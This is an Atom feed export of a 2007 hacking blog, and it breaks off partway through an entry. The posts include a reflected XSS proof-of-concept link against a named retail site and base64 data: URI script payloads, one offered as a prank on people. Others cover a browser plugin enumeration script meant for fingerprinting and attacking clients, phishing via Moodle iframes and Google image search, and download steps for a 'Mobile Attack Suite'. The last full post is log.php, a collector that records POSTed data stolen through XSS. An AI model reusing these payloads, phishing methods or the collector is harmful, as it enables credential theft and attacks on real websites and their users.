<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4755206373963828096</id><updated>2012-01-06T11:27:21.115Z</updated><category term='video'/><category term='PHP'/><category term='IDS'/><category term='offtopic'/><category term='security'/><title type='text'>fazed@darkstar.net #</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-4414859835751396070</id><published>2007-11-07T14:43:00.000Z</published><updated>2007-11-07T14:44:44.453Z</updated><title type='text'>Blog Moved..</title><content type='html'>I am moving to a new domain using custom&lt;br /&gt;made blog software, it will be set up soon&lt;br /&gt;at the domain: &lt;a href="http://fazed-darkstar.co.uk"&gt;fazed-darkstar.co.uk&lt;/a&gt;&lt;br /&gt;I am also setting up a site at: &lt;a href="http://darkstar.me.uk"&gt;darkstar.me.uk&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-4414859835751396070?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/4414859835751396070/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=4414859835751396070' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4414859835751396070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/4414859835751396070'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/11/blog-moved.html' title='Blog Moved..'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-7372365708936570858</id><published>2007-11-07T14:34:00.000Z</published><updated>2007-11-07T14:38:18.639Z</updated><title type='text'>Moodle Phishing</title><content type='html'>Iframes really are evil..&lt;br /&gt;at college we have a system called&lt;br /&gt;moodle for handling all our assignments&lt;br /&gt;and email etc. anyway they use iframes&lt;br /&gt;who's content is set by a GET variable,&lt;br /&gt;now if you read back a bit you will&lt;br /&gt;see that this can lead to a phishing&lt;br /&gt;attack as the user trusts the domain they&lt;br /&gt;are on. this can also lead to XSS attacks&lt;br /&gt;through the use of either the javascript:&lt;br /&gt;protocol or the data: protocol (firefox)&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-7372365708936570858?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/7372365708936570858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=7372365708936570858' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7372365708936570858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7372365708936570858'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/11/moodle-phishing.html' title='Moodle Phishing'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-3568570806655439424</id><published>2007-11-02T11:38:00.000Z</published><updated>2007-11-02T11:39:53.714Z</updated><title type='text'>Intelligent Retail XSS</title><content type='html'>hmm just went looking over the intelligent&lt;br /&gt;retail CMS again and found anouther XSS:&lt;br /&gt;&lt;a href="http://www.youandyourz.co.uk/index.jsp?'%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cg"&gt;POC&lt;/a&gt;&lt;br /&gt;Im not even going to bother looking any more&lt;br /&gt;there must be so many holes in this system.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-3568570806655439424?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/3568570806655439424/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=3568570806655439424' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3568570806655439424'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3568570806655439424'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/11/intelligent-retail-xss.html' title='Intelligent Retail XSS'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-9063515768925116173</id><published>2007-11-02T10:58:00.000Z</published><updated>2007-11-02T11:19:37.064Z</updated><title type='text'>Firefox Data:</title><content type='html'>Ok i know this is on &lt;a href="gnucitizen.org"&gt;GnuCitizen&lt;/a&gt; today&lt;br /&gt;but it is actually very interesting. at the moment I am in&lt;br /&gt;college but I liked the implications of this so much that&lt;br /&gt;I am posting asap.&lt;br /&gt;Anyways, Firefox uses the data: protocol to handle&lt;br /&gt;data that is passed from the site to the browser,&lt;br /&gt;you can then create your own data that will be&lt;br /&gt;executed on the current site like so:&lt;br /&gt;&lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydChTdHJpbmcuZnJvbUNoYXJDb2RlKDc2LDExMSwxMTEsMTA3LDMyLDk0KSk8L3NjcmlwdD4="&gt;Proof Of Concept&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;you can do this widouth the base64 encoded text&lt;br /&gt;and have it in plain text instead but that is easier&lt;br /&gt;for people to see what you are doing.&lt;br /&gt;&lt;br /&gt;heres a funny one to do to people:&lt;br /&gt;&lt;a href="data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cHM6Ly95b3VmYWlsLm9yZz48L2lmcmFtZT4="&gt;Proof Of Concept&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;you could expand this much more.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-9063515768925116173?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/9063515768925116173/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=9063515768925116173' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/9063515768925116173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/9063515768925116173'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/11/firefox-data.html' title='Firefox Data:'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-7881063773291706249</id><published>2007-10-28T21:33:00.000Z</published><updated>2007-10-28T21:52:55.191Z</updated><title type='text'>Firefox/Opera Plugin Enumeration</title><content type='html'>This simple Script will test a web browser&lt;br /&gt;for different browser plugins.&lt;br /&gt;this information can then be used to do&lt;br /&gt;OS fingerprinting and/or to launch an attack&lt;br /&gt;against the client.&lt;br /&gt;The main problem is that this doesn't&lt;br /&gt;accept varibles and so it has to&lt;br /&gt;be repeted loads of times.&lt;br /&gt;you can test this script: &lt;a href="http://ourwebportals.co.uk/tools/plugin_enum.html"&gt;&lt;button&gt;Here&lt;/button&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote height="100" style="overflow: auto;"&gt;&lt;small&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;Plugin Enumeration&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;function enum(){&lt;br /&gt; xs = '';&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[0].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[1].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[2].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[3].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[4].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[5].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[6].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[7].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[8].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[9].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[10].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[11].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[12].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[13].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[14].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[15].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[16].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[17].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[18].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[19].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[20].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[21].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[22].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[23].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[24].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[25].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[26].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[27].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[28].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[29].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[30].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[31].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[32].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[33].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[34].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[35].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[36].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[37].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[38].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[39].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt;try { xs += &amp;quot;&amp;lt;br&amp;gt;&amp;quot; + navigator.plugins[40].name; } catch(e) { xs += &amp;quot;&amp;quot;; }&lt;br /&gt; document.write(xs);&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;!-- Plugin Enumeration&lt;br /&gt;Created By [fazed] --!&amp;gt;&lt;br /&gt;&amp;lt;small&amp;gt;Plugin Emumeration&amp;lt;br&amp;gt;By [fazed]&amp;lt;/small&amp;gt;&amp;lt;div id='plugs'&amp;gt;&amp;lt;a href=&amp;quot;javascript: enum();&amp;quot;&amp;gt;&amp;lt;button&amp;gt;Go&amp;lt;/button&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-7881063773291706249?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/7881063773291706249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=7881063773291706249' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7881063773291706249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7881063773291706249'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/firefoxopera-plugin-enumeration.html' title='Firefox/Opera Plugin Enumeration'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-7274638219349652775</id><published>2007-10-27T02:59:00.000+01:00</published><updated>2007-10-27T03:12:03.131+01:00</updated><title type='text'>Mobile Attack Suite v1r1</title><content type='html'>I have just thrown together a few of&lt;br /&gt;my tools I have created over the years&lt;br /&gt;to end up with a toolkit that will run&lt;br /&gt;from a windows mobile/CE device with an&lt;br /&gt;internet connection.&lt;br /&gt;&lt;br /&gt;First you will need pythonCE:&lt;br /&gt;http://www.sourceforge.net/projects/pythonce&lt;br /&gt;&lt;br /&gt;Install that to your mobile device and on your&lt;br /&gt;computer create a .txt file called attackSuite.txt&lt;br /&gt;the source for the Suite is &lt;a href="http://ourwebportals.co.uk/attackSuite.txt"&gt;&lt;button&gt;Here&lt;/button&gt;&lt;/a&gt;&lt;br /&gt;(please dont use this url to often as it uses up&lt;br /&gt;our bandwidth.)&lt;br /&gt;&lt;br /&gt;upload this file somewhere.&lt;br /&gt;in python on the mobile device run&lt;br /&gt;the following commands:&lt;br /&gt;&lt;blockquote&gt;from urllib import *&lt;br /&gt;sh = urlopen("http://host/attackSuite.txt")&lt;br /&gt;fh = open("attacksuite.py", "w")&lt;br /&gt;fh.write(sh.read())&lt;br /&gt;fh.close()&lt;br /&gt;sh.close()&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;now you can load the suite by typing:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;from attacksuite import *&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;to get more help from within the application&lt;br /&gt;type: helper()&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-7274638219349652775?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/7274638219349652775/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=7274638219349652775' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7274638219349652775'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7274638219349652775'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/mobile-attack-suite-v1r1.html' title='Mobile Attack Suite v1r1'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-5166979219508238222</id><published>2007-10-25T00:50:00.000+01:00</published><updated>2007-10-27T03:25:07.303+01:00</updated><title type='text'>CSRF Video.</title><content type='html'>Have Switched to using&lt;br /&gt;rapidshare due to poor quality&lt;br /&gt;of youtube and hope this is a bit better..&lt;br /&gt;just realised that the font I&lt;br /&gt;used cut off the F in CSRF&lt;br /&gt;at the title so it now says CSR..&lt;br /&gt;oh well im a busy guy. I cant be bothered&lt;br /&gt;to change that. anyway you can download&lt;br /&gt;the video from rapidshare:&lt;br /&gt;&lt;a href="http://rapidshare.com/files/65456358/CSRF_1.wmv.html"&gt;&lt;button&gt;CSRF_1.wmv&lt;/button&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-5166979219508238222?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/5166979219508238222/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=5166979219508238222' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5166979219508238222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/5166979219508238222'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/csrf-video.html' title='CSRF Video.'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-3257935939336478741</id><published>2007-10-21T22:26:00.000+01:00</published><updated>2007-10-22T01:40:26.269+01:00</updated><title type='text'>CSRF.</title><content type='html'>After Reading A post on&lt;br /&gt;&lt;a href="http://insanesecurity.wordpress.com"&gt;InsaneSecurity&lt;/a&gt;&lt;br /&gt;About CSRF I desided to see how&lt;br /&gt;far this problem extends,&lt;br /&gt;We All know the simple thinks such&lt;br /&gt;as login people out of accounts..&lt;br /&gt;(on blogger you give them the link: &lt;br /&gt;http://www.blogger.com/logout.g) but&lt;br /&gt;this isn't as far as it goes.&lt;br /&gt;I desided to do some controled testing&lt;br /&gt;to see how far I could push the use of&lt;br /&gt;CSRF.&lt;br /&gt;I will post a video of exploiting CSRF through&lt;br /&gt;AJAX in my next post. As explained at the end&lt;br /&gt;of the video you could use a POST request within&lt;br /&gt;an XSS to execute more advanced CSRF attacks and&lt;br /&gt;when Cross site requesting is added to the AJAX&lt;br /&gt;specification you will be able to embed this within&lt;br /&gt;your own site.&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-3257935939336478741?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/3257935939336478741/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=3257935939336478741' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3257935939336478741'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/3257935939336478741'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/csrf.html' title='CSRF.'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-7403681171956184638</id><published>2007-10-10T16:05:00.000+01:00</published><updated>2007-10-10T16:08:58.975+01:00</updated><title type='text'>phishing with google</title><content type='html'>If you want to send someone a link then it&lt;br /&gt;is best to send them a url that they trust right?&lt;br /&gt;I have just discovered (although it has probably been used&lt;br /&gt;many times before) that you can use the google image&lt;br /&gt;search to show a webpage of your choice, this means that&lt;br /&gt;you could phish google passwords by creating a page that&lt;br /&gt;says that the viewer needs to log into google to view the&lt;br /&gt;image,&lt;br /&gt;here is a PoC link to show you how it works:&lt;br /&gt;&lt;blockquote&gt;&lt;a href='http://images.google.co.uk/imgres?imgurl=http://google.com/intel/en_uk/images/logo.gif&amp;imgrefurl=http://google.com'&gt;PoC on google&lt;/a&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4755206373963828096-7403681171956184638?l=fazed-darkstar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://fazed-darkstar.blogspot.com/feeds/7403681171956184638/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4755206373963828096&amp;postID=7403681171956184638' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7403681171956184638'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4755206373963828096/posts/default/7403681171956184638'/><link rel='alternate' type='text/html' href='http://fazed-darkstar.blogspot.com/2007/10/phishing-with-google.html' title='phishing with google'/><author><name>fazed</name><uri>http://www.blogger.com/profile/13193011176013154281</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://bp2.blogger.com/_tWRWgmxuJ2o/SJM_9A6pkZI/AAAAAAAAAC0/FJsHeRzxZNA/S220/SAmm+Angii+MEe+071.JPG'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4755206373963828096.post-2396098542682327167</id><published>2007-10-09T02:17:00.000+01:00</published><updated>2007-10-09T02:29:51.068+01:00</updated><title type='text'>Code for log.php</title><content type='html'>I was asked for the code for&lt;br /&gt;the log.php i used in the XSS on horde,&lt;br /&gt;its a VERY simple logger that&lt;br /&gt;reads any input.&lt;br /&gt;&lt;blockquote&gt;&amp;lt;?php&lt;br /&gt;$fh = fopen("log.txt", "a");&lt;br /&gt;fwrite($fh, "\n--New Log--");&lt;br /&gt;foreach($_POST as $i)&lt;br /&gt;{&lt;br /&gt; &amp;nbsp;fwrite($fh,"\n".$i);&lt;br /&gt;}&lt;br /&gt;fclose($fh);&lt;br /&gt;if(!header("Location: http://[whereever]"))&lt;br /&gt;{&lt;br /&gt;&amp;nbsp;echo "&amp;lt;script&amp;gt;";&lt;br /&gt;&amp;nbsp;echo "document.location.href='http://[whereever]'";&lt;br /&gt;&amp;nbsp;echo "&amp;lt;/script&amp;gt;";&lt;br /&gt;}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;now you can post any varible to this and it&lt;br /&gt;will save it(/them) and redirect to [whereever].&lt;br /&gt;hope this helps..&lt;div class="blogger-post-footer"&gt;&amp;copy; 2007 fazed&lt;img width='1' 